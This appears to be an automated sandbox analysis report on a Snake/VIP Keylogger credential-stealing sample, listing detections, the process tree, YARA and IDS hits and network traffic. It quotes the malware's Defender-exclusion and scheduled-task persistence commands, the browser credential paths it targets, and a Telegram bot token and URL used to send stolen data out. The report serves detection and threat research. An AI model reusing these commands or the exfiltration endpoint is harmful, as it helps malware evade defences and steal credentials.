Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OtldpQxzAw.exe

Overview

General Information

Sample name:OtldpQxzAw.exe
renamed because original name is a hash value
Original sample name:faa9fee2bec12a0b25d42223d3171fb74343937b0d4f3b15a02135e1f60367de.exe
Analysis ID:1632374
MD5:3d54923bbe333fb9cbb379196b4702aa
SHA1:90e990b7fca001ab4dd03f3bf205c957b53fdfbe
SHA256:faa9fee2bec12a0b25d42223d3171fb74343937b0d4f3b15a02135e1f60367de
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • OtldpQxzAw.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)
    • powershell.exe (PID: 6896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6152 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7064 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • OtldpQxzAw.exe (PID: 5628 cmdline: "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)
    • OtldpQxzAw.exe (PID: 808 cmdline: "C:\Users\user\Desktop\OtldpQxzAw.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)
  • wiSeRRwvZHTk.exe (PID: 2664 cmdline: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe MD5: 3D54923BBE333FB9CBB379196B4702AA)
    • schtasks.exe (PID: 6544 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wiSeRRwvZHTk.exe (PID: 5172 cmdline: "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe" MD5: 3D54923BBE333FB9CBB379196B4702AA)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat id": "5022382431"}
{"Exfil Mode": "Telegram", "Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat_id": "5022382431", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x2147:$a1: get_encryptedPassword
    • 0x2470:$a2: get_encryptedUsername
    • 0x1f57:$a3: get_timePasswordChanged
    • 0x2060:$a4: get_passwordField
    • 0x215d:$a5: set_encryptedPassword
    • 0x37f1:$a7: get_logins
    • 0x3754:$a10: KeyLoggerEventArgs
    • 0x33b9:$a11: KeyLoggerEventArgsEventHandler
    0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2c547:$a1: get_encryptedPassword
                • 0x2c870:$a2: get_encryptedUsername
                • 0x2c357:$a3: get_timePasswordChanged
                • 0x2c460:$a4: get_passwordField
                • 0x2c55d:$a5: set_encryptedPassword
                • 0x2dbf1:$a7: get_logins
                • 0x2db54:$a10: KeyLoggerEventArgs
                • 0x2d7b9:$a11: KeyLoggerEventArgsEventHandler
                10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3a281:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39924:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39b81:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3a560:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 43 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", ProcessId: 6896, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", ProcessId: 6896, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe, ParentImage: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe, ParentProcessId: 2664, ParentProcessName: wiSeRRwvZHTk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", ProcessId: 6544, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", ProcessId: 7064, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", ProcessId: 6896, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6940, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", ProcessId: 7064, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:00:06.253553+010028033053Unknown Traffic192.168.2.849684104.21.32.1443TCP
                2025-03-07T23:00:25.577084+010028033053Unknown Traffic192.168.2.849691104.21.32.1443TCP
                2025-03-07T23:00:31.575861+010028033053Unknown Traffic192.168.2.849697104.21.32.1443TCP
                2025-03-07T23:00:37.129249+010028033053Unknown Traffic192.168.2.849708104.21.32.1443TCP
                2025-03-07T23:00:40.086985+010028033053Unknown Traffic192.168.2.849716104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T22:59:59.615864+010028032742Potentially Bad Traffic192.168.2.849682193.122.130.080TCP
                2025-03-07T23:00:04.165421+010028032742Potentially Bad Traffic192.168.2.849682193.122.130.080TCP
                2025-03-07T23:00:15.522001+010028032742Potentially Bad Traffic192.168.2.849685193.122.130.080TCP
                2025-03-07T23:00:17.553216+010028032742Potentially Bad Traffic192.168.2.849686193.122.130.080TCP
                2025-03-07T23:00:20.990736+010028032742Potentially Bad Traffic192.168.2.849685193.122.130.080TCP
                2025-03-07T23:00:23.443829+010028032742Potentially Bad Traffic192.168.2.849685193.122.130.080TCP
                2025-03-07T23:00:26.115692+010028032742Potentially Bad Traffic192.168.2.849693193.122.130.080TCP
                2025-03-07T23:00:28.897142+010028032742Potentially Bad Traffic192.168.2.849695193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:00:49.700570+010018100081Potentially Bad Traffic192.168.2.849722149.154.167.220443TCP
                2025-03-07T23:00:52.544691+010018100081Potentially Bad Traffic192.168.2.849723149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:00:42.481770+010018100071Potentially Bad Traffic192.168.2.849718149.154.167.220443TCP
                2025-03-07T23:00:45.371013+010018100071Potentially Bad Traffic192.168.2.849721149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: OtldpQxzAw.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.gmupi
                Source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat id": "5022382431"}
                Source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat_id": "5022382431", "Version": "4.4"}
                Source: OtldpQxzAw.exe.808.9.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendMessage"}
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeReversingLabs: Detection: 73%
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeVirustotal: Detection: 76%Perma Link
                Source: OtldpQxzAw.exeVirustotal: Detection: 76%Perma Link
                Source: OtldpQxzAw.exeReversingLabs: Detection: 73%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpackString decryptor: 7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpackString decryptor: 5022382431
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpackString decryptor:
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpackString decryptor: 7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpackString decryptor: 5022382431
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: OtldpQxzAw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49687 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49690 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2
                Source: OtldpQxzAw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RufU.pdbSHA256 source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr
                Source: Binary string: RufU.pdb source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 010BF2EDh9_2_010BF150
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 010BF2EDh9_2_010BF33C
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 010BFAA9h9_2_010BF804
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 06882D49h9_2_06882A98
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 06883310h9_2_06882EF8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688F139h9_2_0688EE90
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688F591h9_2_0688F2E8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 06883310h9_2_06882EF3
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688ECE1h9_2_0688EA38
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 06883310h9_2_0688323E
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06880673
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688FE41h9_2_0688FB98
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 06880D0Dh9_2_06880B30
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 068816F8h9_2_06880B30
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688F9E9h9_2_0688F740
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688D729h9_2_0688D480
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688DB81h9_2_0688D8D8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688D2D1h9_2_0688D028
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06880040
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06880853
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688E431h9_2_0688E188
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688E889h9_2_0688E5E0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 4x nop then jmp 0688DFD9h9_2_0688DD30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 07CABD4Dh10_2_07CAB785
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 030BF2EDh14_2_030BF33C
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 030BF2EDh14_2_030BF150
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 030BFAA9h14_2_030BF7F1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DA3310h14_2_06DA2EF8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DA2D49h14_2_06DA2A98
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DA3310h14_2_06DA2EEE
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAF139h14_2_06DAEE90
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06DA0673
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAF9E9h14_2_06DAF740
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAD729h14_2_06DAD480
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAE889h14_2_06DAE5E0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DADFD9h14_2_06DADD30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAF591h14_2_06DAF2E8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAECE1h14_2_06DAEA38
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DA3310h14_2_06DA323E
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAFE41h14_2_06DAFB98
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DA0D0Dh14_2_06DA0B30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DA16F8h14_2_06DA0B30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DADB81h14_2_06DAD8D8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06DA0853
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06DA0040
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAD2D1h14_2_06DAD028
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 4x nop then jmp 06DAE431h14_2_06DAE188

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49721 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49718 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49722 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49723 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
